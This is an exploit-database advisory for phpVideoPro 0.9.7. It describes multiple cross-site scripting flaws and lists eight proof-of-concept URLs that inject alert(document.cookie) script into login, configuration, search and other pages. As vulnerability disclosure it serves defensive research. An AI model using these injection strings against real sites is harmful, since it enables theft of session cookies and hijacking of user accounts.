phpVideoPro 0.8.x0.9.7 - Multiple Cross-Site Scripting Vulnerabilities

2012-01-16T00:00:00
ID EXPLOITPACK:667DA38DB18C2A8D3C6A963421DE1CA3
Type exploitpack
Reporter Stefan Schurtz
Modified 2012-01-16T00:00:00

Description

phpVideoPro 0.8.x0.9.7 - Multiple Cross-Site Scripting Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/51428/info

phpVideoPro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

phpVideoPro 0.9.7 is vulnerable; prior versions may also be affected. 

http://www.example.com/phpvideopro-0.9.7/help/index.php?topic='"</script><script>alert(document.cookie)</script>
http://www.example.com/phpvideopro-0.9.7/login/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/configure.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/medialist.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/setfilter.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/search.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/listgen.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/label.php/"><script>alert(document.cookie)</script><"